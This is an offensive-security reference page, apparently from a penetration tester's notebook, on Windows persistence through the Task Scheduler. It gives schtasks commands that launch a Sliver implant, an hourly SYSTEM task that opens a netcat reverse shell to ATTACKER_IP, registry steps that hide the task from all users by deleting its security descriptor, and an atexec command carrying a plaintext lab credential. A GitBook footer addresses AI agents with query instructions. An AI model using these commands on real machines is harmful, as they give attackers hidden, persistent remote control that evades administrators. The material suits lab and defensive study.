> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/persistence/windows-persistence-1/task-scheduler.md).

# Task Scheduler

### Schtasks Quick Reference

Generate a schtask that will run once (to launch a sliver), remove it after you get your callback

```
schtasks /create /tn "OneShotTask" /tr "C:\Users\htb-student\Desktop\sliver.exe" /sc ONCE /st 23:59 /rl HIGHEST /f
# if you have admin and want system
schtasks /create /tn "OneShotTask" /tr "C:\Users\htb-student\Desktop\sliver.exe" /sc ONCE /st 20:53 /ru SYSTEM /rl HIGHEST /f
# fire it immediately (dont wait for the time)
schtasks /run /tn "OneShotTask"
# clean up the task 
schtasks /delete /tn "OneShotTask" /f
```

```
#normal task 15 minutes 
SCHTASKS /create /sc minute /mo 15 /tn "Security Scan" /tr "C:\Windows\System32\spool\drivers\color\patch.exe" 
#query all 
SCHTASKS /query
#delete task 
schtasks /delete /tn "\Security Scan" /F
#Query Specific task by name
schtasks /query /fo LIST /tn "Daily Reboot"
```

* The most common way to schedule tasks is using the built-in Windows task scheduler.
* Let's create a task that runs a reverse shell every single hour.

```
schtasks /create /sc hourly /mo 1 /tn TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe ATTACKER_IP 4449" /ru SYSTEM
SUCCESS: The scheduled task "TaskBackdoor" has successfully been created.
```

* To check if our task was successfully created, we can use the following command:

```
schtasks /query /tn TaskBackdoor
Folder: \
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
TaskBackdoor                         5/25/2022 8:08:00 AM   Ready
```

### Making Our Task Invisible

* Our task should be up and running by now, but if the compromised user tries to list its scheduled tasks, our backdoor will be noticeable.
* To further hide our scheduled task, we can make it invisible to any user in the system by deleting its `Security Descriptor (SD)`. The security descriptor is simply an ACL that states which users have access to the scheduled task.
* If your user isn't allowed to query a scheduled task, you won't be able to see it anymore, as Windows only shows you the tasks that you have permission to use. -
* Deleting the SD is equivalent to disallowing all users' access to the scheduled task, including administrators.
* The security descriptors of all scheduled tasks are stored in `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\`. You will find a registry key for every task, under which a value named "`SD`" contains the security descriptor.
* **You can only erase the value if you hold `SYSTEM` privileges.**
* To hide our task, let's delete the `SD` value for the "`TaskBackdoor`" task we created before. To do so, we will use `psexec` to open Regedit with SYSTEM privileges:

```
c:\tools\pstools\PsExec64.exe -s -i regedit
```

* We will then delete the security descriptor for our task:
*

```
<figure><img src="https://user-images.githubusercontent.com/75596877/181060133-34619dcd-33be-40f5-aa62-2fead6f2b4de.png" alt=""><figcaption></figcaption></figure>
```

* If we try to query our service again, the system will tell us there is no such task:

```
schtasks /query /tn TaskBackdoors
ERROR: The system cannot find the file specified.
```

### atexec Scheduled Task Execution

```
python3 atexec.py CICADA/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@10.10.11.35 dir
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/persistence/windows-persistence-1/task-scheduler.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.